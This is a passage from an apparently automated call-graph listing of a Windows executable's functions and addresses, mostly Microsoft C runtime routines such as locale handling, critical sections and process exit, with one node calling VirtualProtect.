18278->18299 18279->18270 18281 c2b4a7 ___scrt_is_nonwritable_in_current_image 18280->18281 18282 c2b4b0 18281->18282 18283 c2b4d1 18281->18283 18285 c1da28 __dosmaperr 14 API calls 18282->18285 18302 c1da7c EnterCriticalSection 18283->18302 18286 c2b4b5 18285->18286 18287 c1d94e __strnicoll 25 API calls 18286->18287 18289 c24730 18287->18289 18288 c2b509 18310 c2b530 18288->18310 18289->18278 18293 c245a4 GetStartupInfoW 18289->18293 18292 c2b4dd 18292->18288 18303 c2b3eb 18292->18303 18294 c245c1 18293->18294 18295 c24655 18293->18295 18294->18295 18296 c2b49b 26 API calls 18294->18296 18295->18277 18297 c245e9 18296->18297 18297->18295 18298 c24619 GetFileType 18297->18298 18298->18297 18319 c1dac4 LeaveCriticalSection 18299->18319 18301 c24750 18301->18258 18302->18292 18304 c22f42 __dosmaperr 14 API calls 18303->18304 18306 c2b3fd 18304->18306 18305 c2b40a 18307 c22f9f _free 14 API calls 18305->18307 18306->18305 18313 c257de 18306->18313 18309 c2b45f 18307->18309 18309->18292 18318 c1dac4 LeaveCriticalSection 18310->18318 18312 c2b537 18312->18289 18314 c254d1 std::_Locinfo::_Locinfo_dtor 5 API calls 18313->18314 18315 c257fa 18314->18315 18316 c25818 InitializeCriticalSectionAndSpinCount 18315->18316 18317 c25803 18315->18317 18316->18317 18317->18306 18318->18312 18319->18301 18321 c20b1c 18320->18321 18324 c20b32 18320->18324 18321->18324 18326 c20b3f 18321->18326 18323 c20b29 18323->18324 18339 c20c91 18323->18339 18324->18139 18327 c20b4b 18326->18327 18328 c20b48 18326->18328 18347 c2acda 18327->18347 18328->18323 18333 c20b5d 18336 c22f9f _free 14 API calls 18333->18336 18337 c20b8c 18336->18337 18337->18323 18338 c22f9f _free 14 API calls 18338->18333 18340 c20d02 18339->18340 18345 c20ca0 18339->18345 18340->18324 18341 c29b81 WideCharToMultiByte __cftof 18341->18345 18342 c22f42 __dosmaperr 14 API calls 18342->18345 18343 c20d06 18344 c22f9f _free 14 API calls 18343->18344 18344->18340 18345->18340 18345->18341 18345->18342 18345->18343 18346 c22f9f _free 14 API calls 18345->18346 18346->18345 18348 c2ace3 18347->18348 18349 c20b52 18347->18349 18382 c23720 18348->18382 18353 c2afce GetEnvironmentStringsW 18349->18353 18354 c2afe5 18353->18354 18355 c2b03b 18353->18355 18358 c29b81 __cftof WideCharToMultiByte 18354->18358 18356 c2b044 FreeEnvironmentStringsW 18355->18356 18357 c20b57 18355->18357 18356->18357 18357->18333 18365 c20b92 18357->18365 18359 c2affe 18358->18359 18359->18355 18360 c22fd9 __strnicoll 15 API calls 18359->18360 18361 c2b00e 18360->18361 18362 c2b026 18361->18362 18363 c29b81 __cftof WideCharToMultiByte 18361->18363 18364 c22f9f _free 14 API calls 18362->18364 18363->18362 18364->18355 18366 c20ba7 18365->18366 18367 c22f42 __dosmaperr 14 API calls 18366->18367 18378 c20bce 18367->18378 18368 c20c33 18369 c22f9f _free 14 API calls 18368->18369 18370 c20b68 18369->18370 18370->18338 18371 c22f42 __dosmaperr 14 API calls 18371->18378 18372 c20c35 18562 c20c62 18372->18562 18376 c22f9f _free 14 API calls 18376->18368 18377 c20c55 18379 c1d97b __Getctype 11 API calls 18377->18379 18378->18368 18378->18371 18378->18372 18378->18377 18380 c22f9f _free 14 API calls 18378->18380 18553 c22e29 18378->18553 18381 c20c61 18379->18381 18380->18378 18383 c23731 18382->18383 18384 c2372b 18382->18384 18385 c25721 __dosmaperr 6 API calls 18383->18385 18406 c23737 18383->18406 18386 c256e2 __dosmaperr 6 API calls 18384->18386 18387 c2374b 18385->18387 18386->18383 18388 c22f42 __dosmaperr 14 API calls 18387->18388 18387->18406 18390 c2375b 18388->18390 18389 c200c9 __FrameHandler3::FrameUnwindToState 37 API calls 18391 c237b9 18389->18391 18392 c23763 18390->18392 18393 c23778 18390->18393 18395 c25721 __dosmaperr 6 API calls 18392->18395 18396 c25721 __dosmaperr 6 API calls 18393->18396 18394 c237b0 18407 c2ab26 18394->18407 18397 c2376f 18395->18397 18398 c23784 18396->18398 18403 c22f9f _free 14 API calls 18397->18403 18399 c23797 18398->18399 18400 c23788 18398->18400 18402 c23491 __dosmaperr 14 API calls 18399->18402 18401 c25721 __dosmaperr 6 API calls 18400->18401 18401->18397 18404 c237a2 18402->18404 18403->18406 18405 c22f9f _free 14 API calls 18404->18405 18405->18406 18406->18389 18406->18394 18408 c2ac3a __cftoe 37 API calls 18407->18408 18409 c2ab39 18408->18409 18426 c2a8d0 18409->18426 18412 c2ab52 18412->18349 18413 c22fd9 __strnicoll 15 API calls 18414 c2ab63 18413->18414 18415 c2ab95 18414->18415 18433 c2ad35 18414->18433 18418 c22f9f _free 14 API calls 18415->18418 18420 c2aba3 18418->18420 18419 c2ab90 18421 c1da28 __dosmaperr 14 API calls 18419->18421 18420->18349 18421->18415 18422 c2abd7 18422->18415 18444 c2a7c2 18422->18444 18423 c2abab 18423->18422 18424 c22f9f _free 14 API calls 18423->18424 18424->18422 18427 c1bdee __cftoe 37 API calls 18426->18427 18428 c2a8e2 18427->18428 18429 c2a903 18428->18429 18430 c2a8f1 GetOEMCP 18428->18430 18431 c2a91a 18429->18431 18432 c2a908 GetACP 18429->18432 18430->18431 18431->18412 18431->18413 18432->18431 18434 c2a8d0 39 API calls 18433->18434 18435 c2ad55 18434->18435 18436 c2adcb codecvt 18435->18436 18437 c2ad8f IsValidCodePage 18435->18437 18438 c17193 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18436->18438 18437->18436 18439 c2ada1 18437->18439 18440 c2ab88 18438->18440 18441 c2add0 GetCPInfo 18439->18441 18443 c2adaa codecvt 18439->18443 18440->18419 18440->18423 18441->18436 18441->18443 18452 c2a9a6 18443->18452 18445 c2a7ce ___scrt_is_nonwritable_in_current_image 18444->18445 18527 c1da7c EnterCriticalSection 18445->18527 18447 c2a7d8 18528 c2a80f 18447->18528 18453 c2aa97 18452->18453 18454 c2a9ce GetCPInfo 18452->18454 18455 c17193 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18453->18455 18454->18453 18458 c2a9e6 18454->18458 18457 c2ab24 18455->18457 18457->18436 18463 c2802b 18458->18463 18462 c28318 41 API calls 18462->18453 18464 c1bdee __cftoe 37 API calls 18463->18464 18465 c2804b 18464->18465 18483 c29b05 18465->18483 18467 c28078 18471 c22fd9 __strnicoll 15 API calls 18467->18471 18473 c2809e __alloca_probe_16 codecvt 18467->18473 18474 c28109 18467->18474 18468 c17193 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18469 c2812c 18468->18469 18478 c28318 18469->18478 18470 c28103 18486 c17175 18470->18486 18471->18473 18473->18470 18475 c29b05 __fassign MultiByteToWideChar 18473->18475 18474->18468 18476 c280ec 18475->18476 18476->18470 18477 c280f3 GetStringTypeW 18476->18477 18477->18470 18479 c1bdee __cftoe 37 API calls 18478->18479 18480 c2832b 18479->18480 18493 c2812e 18480->18493 18484 c29b16 MultiByteToWideChar 18483->18484 18484->18467 18487 c17190 18486->18487 18488 c1717f 18486->18488 18487->18474 18488->18487 18490 c1cd40 18488->18490 18491 c22f9f _free 14 API calls 18490->18491 18492 c1cd58 18491->18492 18492->18487 18494 c28149 __strnicoll 18493->18494 18495 c29b05 __fassign MultiByteToWideChar 18494->18495 18497 c2818d 18495->18497 18496 c17193 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18498 c28305 18496->18498 18499 c22fd9 __strnicoll 15 API calls 18497->18499 18504 c281b2 __alloca_probe_16 18497->18504 18505 c282f2 18497->18505 18498->18462 18499->18504 18500 c29b05 __fassign MultiByteToWideChar 18502 c281f8 18500->18502 18501 c28257 18503 c17175 __freea 14 API calls 18501->18503 18502->18501 18521 c258a0 18502->18521 18503->18505 18504->18500 18504->18501 18505->18496 18508 c28266 18510 c22fd9 __strnicoll 15 API calls 18508->18510 18514 c28278 __alloca_probe_16 18508->18514 18509 c2822e 18509->18501 18512 c258a0 std::_Locinfo::_Locinfo_dtor 6 API calls 18509->18512 18510->18514 18511 c282e3 18513 c17175 __freea 14 API calls 18511->18513 18512->18501 18513->18501 18514->18511 18515 c258a0 std::_Locinfo::_Locinfo_dtor 6 API calls 18514->18515 18516 c282c0 18515->18516 18516->18511 18517 c29b81 __cftof WideCharToMultiByte 18516->18517 18518 c282da 18517->18518 18518->18511 18519 c2830f 18518->18519 18520 c17175 __freea 14 API calls 18519->18520 18520->18501 18522 c253d6 std::_Locinfo::_Locinfo_dtor 5 API calls 18521->18522 18523 c258ab 18522->18523 18524 c258fd __strnicoll 5 API calls 18523->18524 18526 c258b1 18523->18526 18525 c258f1 LCMapStringW 18524->18525 18525->18526 18526->18501 18526->18508 18526->18509 18527->18447 18538 c1fdf8 18528->18538 18530 c2a831 18531 c1fdf8 25 API calls 18530->18531 18532 c2a850 18531->18532 18533 c2a7e5 18532->18533 18534 c22f9f _free 14 API calls 18532->18534 18535 c2a803 18533->18535 18534->18533 18552 c1dac4 LeaveCriticalSection 18535->18552 18537 c2a7f1 18537->18415 18539 c1fe09 18538->18539 18543 c1fe05 _Yarn 18538->18543 18540 c1fe10 18539->18540 18544 c1fe23 codecvt 18539->18544 18541 c1da28 __dosmaperr 14 API calls 18540->18541 18542 c1fe15 18541->18542 18545 c1d94e __strnicoll 25 API calls 18542->18545 18543->18530 18544->18543 18546 c1fe51 18544->18546 18547 c1fe5a 18544->18547 18545->18543 18548 c1da28 __dosmaperr 14 API calls 18546->18548 18547->18543 18549 c1da28 __dosmaperr 14 API calls 18547->18549 18550 c1fe56 18548->18550 18549->18550 18551 c1d94e __strnicoll 25 API calls 18550->18551 18551->18543 18552->18537 18554 c22e36 18553->18554 18555 c22e44 18553->18555 18554->18555 18560 c22e5b 18554->18560 18556 c1da28 __dosmaperr 14 API calls 18555->18556 18557 c22e4c 18556->18557 18558 c1d94e __strnicoll 25 API calls 18557->18558 18559 c22e56 18558->18559 18559->18378 18560->18559 18561 c1da28 __dosmaperr 14 API calls 18560->18561 18561->18557 18563 c20c3b 18562->18563 18564 c20c6f 18562->18564 18563->18376 18565 c20c86 18564->18565 18566 c22f9f _free 14 API calls 18564->18566 18567 c22f9f _free 14 API calls 18565->18567 18566->18564 18567->18563 18642 c12f20 18568->18642 18570 c122f1 18571 c1231d 18570->18571 18656 c14070 18570->18656 18647 c12010 18571->18647 18574 c123e9 18575 c1212c 18574->18575 18695 c13e40 18574->18695 18577 c14630 18575->18577 18578 c153b9 std::_Lockit::_Lockit 7 API calls 18577->18578 18579 c14661 18578->18579 18580 c153b9 std::_Lockit::_Lockit 7 API calls 18579->18580 18584 c146a2 18579->18584 18581 c1467e 18580->18581 18585 c15411 std::_Lockit::~_Lockit 2 API calls 18581->18585 18582 c15411 std::_Lockit::~_Lockit 2 API calls 18583 c146cd 18582->18583 18587 c17193 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18583->18587 18586 c146c1 18584->18586 18588 c171a1 std::ios_base::_Init 3 API calls 18584->18588 18585->18584 18586->18582 18589 c1214b 18587->18589 18590 c14713 18588->18590 18620 c15060 18589->18620 18591 c153b9 std::_Lockit::_Lockit 7 API calls 18590->18591 18592 c1473f 18591->18592 18593 c14789 18592->18593 18594 c148a8 18592->18594 18596 c1580c std::_Locinfo::_Locinfo_ctor 64 API calls 18593->18596 18595 c15580 codecvt 26 API calls 18594->18595 18597 c148b2 18595->18597 18598 c14794 18596->18598 18990 c16d84 18598->18990 18603 c15857 std::_Locinfo::_Locinfo_dtor 64 API calls 18604 c147eb 18603->18604 18605 c147fc 18604->18605 18606 c1cd40 _Yarn 14 API calls 18604->18606 18607 c1cd40 _Yarn 14 API calls 18605->18607 18608 c14815 18605->18608 18606->18605 18607->18608 18609 c1cd40 _Yarn 14 API calls 18608->18609 18610 c1482e 18608->18610 18609->18610 18611 c14847 18610->18611 18612 c1cd40 _Yarn 14 API calls 18610->18612 18613 c14860 18611->18613 18614 c1cd40 _Yarn 14 API calls 18611->18614 18612->18611 18615 c14879 18613->18615 18616 c1cd40 _Yarn 14 API calls 18613->18616 18614->18613 18617 c15411 std::_Lockit::~_Lockit 2 API calls 18615->18617 18616->18615 18618 c1488d 18617->18618 18619 c156da std::_Facet_Register 3 API calls 18618->18619 18619->18586 18621 c12f20 26 API calls 18620->18621 18622 c1509e 18621->18622 18623 c150a4 18622->18623 19043 c14020 18622->19043 18625 c12010 std::ios_base::_Init 26 API calls 18623->18625 18626 c1512b 18625->18626 18627 c1217c 18626->18627 18628 c13e40 26 API calls 18626->18628 18629 c13d30 18627->18629 18628->18627 18630 c13d74 18629->18630 18631 c13e01 18629->18631 18632 c12f20 26 API calls 18630->18632 18633 c17193 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18631->18633 18635 c13d7d 18632->18635 18634 c12183 GetModuleHandleW GetProcAddress VirtualProtect 18633->18634 18634->18155 18636 c13df0 18635->18636 18637 c12010 std::ios_base::_Init 26 API calls 18635->18637 18636->18631 18638 c13e40 26 API calls 18636->18638 18637->18636 18638->18631 19048 c1cd8c 18639->19048 18644 c12f3c 18642->18644 18643 c12f50 18643->18570 18644->18643 18645 c13d30 26 API calls 18644->18645 18646 c12f6f 18645->18646 18646->18570 18648 c12032 18647->18648 18649 c1202a 18647->18649 18648->18574 18651 c12042 std::ios_base::_Init 18649->18651 18699 c18030 18649->18699 18652 c18030 CallUnexpected RaiseException 18651->18652 18653 c12087 18652->18653 18702 c17f8b 18653->18702 18708 c153b9 18656->18708 18659 c153b9 std::_Lockit::_Lockit 7 API calls 18661 c140af 18659->18661 18660 c140ef 18662 c15411 std::_Lockit::~_Lockit 2 API calls 18660->18662 18714 c15411 18661->18714 18664 c140f8 18662->18664 18666 c17193 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18664->18666 18665 c140d0 18665->18660 18721 c171a1 18665->18721 18668 c14109 18666->18668 18668->18571 18670 c153b9 std::_Lockit::_Lockit 7 API calls 18671 c14164 18670->18671 18672 c1428d 18671->18672 18673 c141ae 18671->18673 18744 c15580 18672->18744 18728 c1580c 18673->18728 18680 c141e1 18682 c141fa 18680->18682 18683 c1cd40 _Yarn 14 API calls 18680->18683 18681 c1cd40 _Yarn 14 API calls 18681->18680 18684 c14213 18682->18684 18685 c1cd40 _Yarn 14 API calls 18682->18685 18683->18682 18686 c1422c 18684->18686 18688 c1cd40 _Yarn 14 API calls 18684->18688 18685->18684 18687 c14245 18686->18687 18689 c1cd40 _Yarn 14 API calls 18686->18689 18690 c1425e 18687->18690 18691 c1cd40 _Yarn 14 API calls 18687->18691 18688->18686 18689->18687 18692 c15411 std::_Lockit::~_Lockit 2 API calls 18690->18692 18691->18690 18693 c14272 18692->18693 18741 c156da 18693->18741 18696 c13ea3 18695->18696 18697 c13e7e 18695->18697 18696->18575 18697->18696 18987 c12fa0 18697->18987 18700 c18077 RaiseException 18699->18700 18701 c1804a 18699->18701 18700->18651 18701->18700 18703 c17f98 _Yarn 18702->18703 18707 c120b2 18702->18707 18704 c17fc5 18703->18704 18705 c22e29 ___std_exception_copy 25 API calls 18703->18705 18703->18707 18706 c1cd40 _Yarn 14 API calls 18704->18706 18705->18704 18706->18707 18707->18574 18709 c153c8 18708->18709 18710 c153cf 18708->18710 18749 c1dadb 18709->18749 18712 c14095 18710->18712 18754 c16f45 EnterCriticalSection 18710->18754 18712->18659 18712->18665 18715 c1dae9 18714->18715 18716 c1541b 18714->18716 18807 c1dac4 LeaveCriticalSection 18715->18807 18718 c1542e 18716->18718 18806 c16f53 LeaveCriticalSection 18716->18806 18718->18665 18719 c1daf0 18719->18665 18723 c171a6 _Yarn 18721->18723 18722 c14138 18722->18670 18723->18722 18724 c2058c std::ios_base::_Init 2 API calls 18723->18724 18725 c171c2 std::ios_base::_Init 18723->18725 18724->18723 18726 c18030 CallUnexpected RaiseException 18725->18726 18727 c179f9 18726->18727 18808 c1dd52 18728->18808 18732 c15830 18733 c15840 18732->18733 18734 c1dd52 std::_Locinfo::_Locinfo_dtor 64 API calls 18732->18734 18735 c15664 _Yarn 14 API calls 18733->18735 18734->18733 18736 c141b9 18735->18736 18737 c15857 18736->18737 18738 c15863 18737->18738 18739 c141d0 18737->18739 18740 c1dd52 std::_Locinfo::_Locinfo_dtor 64 API calls 18738->18740 18739->18680 18739->18681 18740->18739 18742 c171a1 std::ios_base::_Init 3 API calls 18741->18742 18743 c156e5 18742->18743 18743->18660 18979 c154d7 18744->18979 18747 c18030 CallUnexpected RaiseException 18748 c1559f 18747->18748 18755 c25939 18749->18755 18754->18712 18776 c252ec 18755->18776 18775 c2596b 18775->18775 18777 c254d1 std::_Locinfo::_Locinfo_dtor 5 API calls 18776->18777 18778 c25302 18777->18778 18779 c25306 18778->18779 18780 c254d1 std::_Locinfo::_Locinfo_dtor 5 API calls 18779->18780 18781 c2531c 18780->18781 18782 c25320 18781->18782 18783 c254d1 std::_Locinfo::_Locinfo_dtor 5 API calls 18782->18783 18784 c25336 18783->18784 18785 c2533a 18784->18785 18786 c254d1 std::_Locinfo::_Locinfo_dtor 5 API calls 18785->18786 18787 c25350 18786->18787 18788 c25354 18787->18788 18789 c254d1 std::_Locinfo::_Locinfo_dtor 5 API calls 18788->18789 18790 c2536a 18789->18790 18791 c2536e 18790->18791 18792 c254d1 std::_Locinfo::_Locinfo_dtor 5 API calls 18791->18792 18793 c25384 18792->18793 18794 c25388 18793->18794 18795 c254d1 std::_Locinfo::_Locinfo_dtor 5 API calls 18794->18795 18796 c2539e 18795->18796 18797 c253a2 18796->18797 18798 c254d1 std::_Locinfo::_Locinfo_dtor 5 API calls 18797->18798 18799 c253b8 18798->18799 18800 c253d6 18799->18800 18801 c254d1 std::_Locinfo::_Locinfo_dtor 5 API calls 18800->18801 18802 c253ec 18801->18802 18803 c253bc 18802->18803 18804 c254d1 std::_Locinfo::_Locinfo_dtor 5 API calls 18803->18804 18805 c253d2 18804->18805 18805->18775 18806->18718 18807->18719 18809 c25939 std::_Locinfo::_Locinfo_dtor 5 API calls 18808->18809 18810 c1dd5f 18809->18810 18817 c1dafd 18810->18817 18813 c15664 18814 c15672 18813->18814 18816 c1567e _Yarn 18813->18816 18815 c1cd40 _Yarn 14 API calls 18814->18815 18814->18816 18815->18816 18816->18732 18818 c1db09 ___scrt_is_nonwritable_in_current_image 18817->18818 18825 c1da7c EnterCriticalSection 18818->18825 18820 c1db17 18826 c1db58 18820->18826 18825->18820 18851 c1dcb7 18826->18851 18828 c1db73 18829 c23663 __Getctype 37 API calls 18828->18829 18847 c1db24 18828->18847 18830 c1db80 18829->18830 18875 c25f13 18830->18875 18833 c1dbac 18835 c1d97b __Getctype 11 API calls 18833->18835 18833->18847 18834 c22fd9 __strnicoll 15 API calls 18836 c1dbd1 18834->18836 18837 c1dcb6 18835->18837 18838 c25f13 std::_Locinfo::_Locinfo_dtor 39 API calls 18836->18838 18836->18847 18839 c1dbed 18838->18839 18840 c1dbf4 18839->18840 18841 c1dc0f 18839->18841 18840->18833 18842 c1dc06 18840->18842 18844 c22f9f _free 14 API calls 18841->18844 18845 c1dc3a 18841->18845 18843 c22f9f _free 14 API calls 18842->18843 18843->18847 18844->18845 18846 c22f9f _free 14 API calls 18845->18846 18845->18847 18846->18847 18848 c1db4c 18847->18848 18978 c1dac4 LeaveCriticalSection 18848->18978 18850 c15818 18850->18813 18852 c1dcd1 18851->18852 18853 c1dcc3 18851->18853 18909 c25c54 18852->18909 18894 c21bda 18853->18894 18856 c1dccd 18856->18828 18858 c1dd47 18860 c1d97b __Getctype 11 API calls 18858->18860 18859 c22f42 __dosmaperr 14 API calls 18861 c1dd03 18859->18861 18862 c1dd51 18860->18862 18863 c1dd2b 18861->18863 18864 c25c54 __cftoe 39 API calls 18861->18864 18866 c25939 std::_Locinfo::_Locinfo_dtor 5 API calls 18862->18866 18865 c22f9f _free 14 API calls 18863->18865 18867 c1dd1a 18864->18867 18868 c1dd40 18865->18868 18869 c1dd5f 18866->18869 18870 c1dd21 18867->18870 18871 c1dd2d 18867->18871 18868->18828 18872 c1dafd std::_Locinfo::_Locinfo_dtor 64 API calls 18869->18872 18870->18858 18870->18863 18873 c21bda std::_Locinfo::_Locinfo_dtor 61 API calls 18871->18873 18874 c1dd88 18872->18874 18873->18863 18874->18828 18876 c25f2a 18875->18876 18877 c25f5c 18876->18877 18881 c25f2e 18876->18881 18878 c1da28 __dosmaperr 14 API calls 18877->18878 18879 c25f61 18878->18879 18880 c1d94e __strnicoll 25 API calls 18879->18880 18891 c1dba5 18880->18891 18882 c25f6f 18881->18882 18883 c25f4f 18881->18883 18937 c25c74 18882->18937 18884 c1da28 __dosmaperr 14 API calls 18883->18884 18886 c25f54 18884->18886 18889 c1d94e __strnicoll 25 API calls 18886->18889 18888 c25f84 18890 c1da28 __dosmaperr 14 API calls 18888->18890 18889->18891 18890->18891 18891->18833 18891->18834 18892 c25f94 18892->18891 18893 c1da28 __dosmaperr 14 API calls 18892->18893 18893->18886 18895 c21bf0 18894->18895 18896 c21c04 18894->18896 18897 c1da28 __dosmaperr 14 API calls 18895->18897 18898 c23663 __Getctype 37 API calls 18896->18898 18900 c21bf5 18897->18900 18899 c21c09 18898->18899 18901 c25939 std::_Locinfo::_Locinfo_dtor 5 API calls 18899->18901 18902 c1d94e __strnicoll 25 API calls 18900->18902 18903 c21c11 18901->18903 18904 c21c00 18902->18904 18905 c2c630 __Getctype 37 API calls 18903->18905 18904->18856 18906 c21c16 18905->18906 18912 c211e2 18906->18912 18908 c21c58 18908->18856 18916 c25b74 18909->18916 18913 c211ee ___scrt_is_nonwritable_in_current_image 18912->18913 18914 c2130f std::_Locinfo::_Locinfo_dtor 61 API calls 18913->18914 18915 c211fa std::_Locinfo::_Locinfo_dtor 18914->18915 18915->18908 18917 c25b8b 18916->18917 18918 c25bca 18917->18918 18919 c25b8f 18917->18919 18920 c1da28 __dosmaperr 14 API calls 18918->18920 18922 c1bdee __cftoe 37 API calls 18919->18922 18921 c25bcf 18920->18921 18923 c1d94e __strnicoll 25 API calls 18921->18923 18924 c25bac 18922->18924 18932 c1dce8 18923->18932 18925 c25bdb 18924->18925 18926 c25bbd 18924->18926 18927 c259d1 __cftoe 39 API calls 18925->18927 18928 c1da28 __dosmaperr 14 API calls 18926->18928 18929 c25be9 18927->18929 18930 c25bc2 18928->18930 18931 c25bf1 18929->18931 18935 c25c03 18929->18935 18933 c1d94e __strnicoll 25 API calls 18930->18933 18934 c1da28 __dosmaperr 14 API calls 18931->18934 18932->18858 18932->18859 18933->18932 18934->18932 18935->18932 18936 c1da28 __dosmaperr 14 API calls 18935->18936 18936->18930 18938 c25c80 __EH_prolog3_GS 18937->18938 18939 c25c9c 18938->18939 18940 c25ca7 18938->18940 18941 c25cbf 18938->18941 18975 c176b8 18939->18975 18942 c1da28 __dosmaperr 14 API calls 18940->18942 18943 c1bdee __cftoe 37 API calls 18941->18943 18945 c25cac 18942->18945 18946 c25cca 18943->18946 18948 c1d94e __strnicoll 25 API calls 18945->18948 18949 c25cfa 18946->18949 18950 c25cdb 18946->18950 18948->18939 18951 c25d02 18949->18951 18952 c25e97 18949->18952 18967 c2f9c6 18950->18967 18955 c25dab 18951->18955 18958 c25d4a 18951->18958 18960 c25d0a 18951->18960 18954 c29b81 __cftof WideCharToMultiByte 18952->18954 18957 c25e9f 18952->18957 18954->18957 18956 c29b81 __cftof WideCharToMultiByte 18955->18956 18961 c25dbe 18956->18961 18957->18939 18962 c1da28 __dosmaperr 14 API calls 18957->18962 18959 c29b81 __cftof WideCharToMultiByte 18958->18959 18959->18960 18960->18939 18963 c1da28 __dosmaperr 14 API calls 18960->18963 18961->18939 18961->18960 18964 c25dd9 GetLastError 18961->18964 18962->18939 18963->18939 18964->18960 18966 c25de8 18964->18966 18965 c29b81 __cftof WideCharToMultiByte 18965->18966 18966->18939 18966->18957 18966->18965 18969 c2fa86 18967->18969 18974 c2f9f7 _Yarn 18967->18974 18968 c31dcd std::_Locinfo::_Locinfo_dtor 14 API calls 18968->18969 18969->18968 18973 c2fa63 18969->18973 18970 c31dcd std::_Locinfo::_Locinfo_dtor 14 API calls 18970->18974 18971 c17193 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18972 c2fac2 18971->18972 18972->18939 18973->18971 18974->18970 18974->18973 18976 c17193 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18975->18976 18977 c176a4 18976->18977 18977->18888 18977->18892 18978->18850 18982 c11150 18979->18982 18983 c17f8b ___std_exception_copy 25 API calls 18982->18983 18984 c11188 18983->18984 18985 c17193 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 18984->18985 18986 c11199 18985->18986 18986->18747 18988 c12010 std::ios_base::_Init 26 API calls 18987->18988 18989 c12fbf 18988->18989 18989->18696 19012 c1f40d 18990->19012 18992 c16d8d __Getctype 18993 c16dc5 18992->18993 18994 c16da7 18992->18994 18996 c1f3e9 __Getctype 37 API calls 18993->18996 18995 c1f3e9 __Getctype 37 API calls 18994->18995 18997 c16dae 18995->18997 18996->18997 19017 c1f432 18997->19017 19000 c147ab 19002 c16def 19000->19002 19003 c16e02 codecvt 19002->19003 19004 c1f40d __Getctype 37 API calls 19003->19004 19005 c16e0a 19004->19005 19038 c1f459 19005->19038 19008 c1f432 __Getctype 37 API calls 19009 c16e19 19008->19009 19010 c1f3e9 __Getctype 37 API calls 19009->19010 19011 c147bf 19009->19011 19010->19011 19011->18603 19013 c23663 __Getctype 37 API calls 19012->19013 19014 c1f418 19013->19014 19015 c238b5 __Getctype 37 API calls 19014->19015 19016 c1f428 19015->19016 19016->18992 19018 c23663 __Getctype 37 API calls 19017->19018 19019 c1f43d 19018->19019 19020 c238b5 __Getctype 37 API calls 19019->19020 19021 c16dd6 19020->19021 19021->19000 19022 c1f8dc 19021->19022 19023 c1f924 19022->19023 19024 c1f8e9 _Yarn 19022->19024 19023->19000 19024->19023 19029 c28361 19024->19029 19027 c1d97b __Getctype 11 API calls 19028 c1f93a 19027->19028 19030 c2837c 19029->19030 19031 c2836e 19029->19031 19032 c1da28 __dosmaperr 14 API calls 19030->19032 19031->19030 19034 c28395 19031->19034 19037 c28386 19032->19037 19033 c1d94e __strnicoll 25 API calls 19035 c1f91d 19033->19035 19034->19035 19036 c1da28 __dosmaperr 14 API calls 19034->19036 19035->19023 19035->19027 19036->19037 19037->19033 19039 c23663 __Getctype 37 API calls 19038->19039 19040 c1f464 19039->19040 19041 c238b5 __Getctype 37 API calls 19040->19041 19042 c16e11 19041->19042 19042->19008 19044 c14028 19043->19044 19045 c14031 19044->19045 19047 c16462 66 API calls 19044->19047 19045->18623 19046 c14054 19046->18623 19047->19046 19066 c1cb47 19048->19066 19050 c1cdd7 19051 c1bdee __cftoe 37 API calls 19050->19051 19058 c1cde3 19051->19058 19052 c1cdb3 19054 c1da28 __dosmaperr 14 API calls 19052->19054 19053 c1cd9e 19053->19050 19053->19052 19065 c1cdc3 19053->19065 19055 c1cdb8 19054->19055 19056 c1d94e __strnicoll 25 API calls 19055->19056 19056->19065 19059 c1ce12 19058->19059 19073 c1d60e 19058->19073 19062 c1ce7c 19059->19062 19079 c1d5b7 19059->19079 19060 c1d5b7 25 API calls 19063 c1cf42 std::_Locinfo::_Locinfo_dtor 19060->19063 19062->19060 19064 c1da28 __dosmaperr 14 API calls 19063->19064 19063->19065 19064->19065 19065->18155 19067 c1cb4c 19066->19067 19068 c1cb5f 19066->19068 19069 c1da28 __dosmaperr 14 API calls 19067->19069 19068->19053 19070 c1cb51 19069->19070 19071 c1d94e __strnicoll 25 API calls 19070->19071 19072 c1cb5c 19071->19072 19072->19053 19074 c1d64b 19073->19074 19076 c1d61b 19073->19076 19075 c1f3e9 __Getctype 37 API calls 19074->19075 19077 c1d62a __fassign 19075->19077 19076->19077 19085 c24803 19076->19085 19077->19058 19080 c1d5c8 19079->19080 19081 c1d5dc 19079->19081 19080->19081 19082 c1da28 __dosmaperr 14 API calls 19080->19082 19081->19062 19083 c1d5d1 19082->19083 19084 c1d94e __strnicoll 25 API calls 19083->19084 19084->19081 19086 c1bdee __cftoe 37 API calls 19085->19086 19087 c24820 19086->19087 19088 c2802b std::_Locinfo::_Locinfo_dtor 40 API calls 19087->19088 19089 c24830 19087->19089 19088->19089 19090 c17193 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 19089->19090 19091 c248cc 19090->19091 19091->19077 19093 c20f83 19092->19093 19094 c20f94 19092->19094 19103 c2101e GetModuleHandleW 19093->19103 19110 c20e3b 19094->19110 19099 c20fce 19099->18123 19104 c20f88 19103->19104 19104->19094 19105 c21061 GetModuleHandleExW 19104->19105 19106 c21080 GetProcAddress 19105->19106 19107 c21095 19105->19107 19106->19107 19108 c210b2 19107->19108 19109 c210a9 FreeLibrary 19107->19109 19108->19094 19109->19108 19111 c20e47 ___scrt_is_nonwritable_in_current_image 19110->19111 19126 c1da7c EnterCriticalSection 19111->19126 19113 c20e51 19127 c20e88 19113->19127 19115 c20e5e 19131 c20e7c 19115->19131 19118 c20fdc 19155 c2b3ba GetPEB 19118->19155 19121 c2100b 19124 c21061 __FrameHandler3::FrameUnwindToState 3 API calls 19121->19124 19122 c20feb GetPEB 19122->19121 19123 c20ffb GetCurrentProcess TerminateProcess 19122->19123 19123->19121 19125 c21013 ExitProcess 19124->19125 19126->19113 19128 c20e94 ___scrt_is_nonwritable_in_current_image 19127->19128 19129 c20ef5 __FrameHandler3::FrameUnwindToState 19128->19129 19134 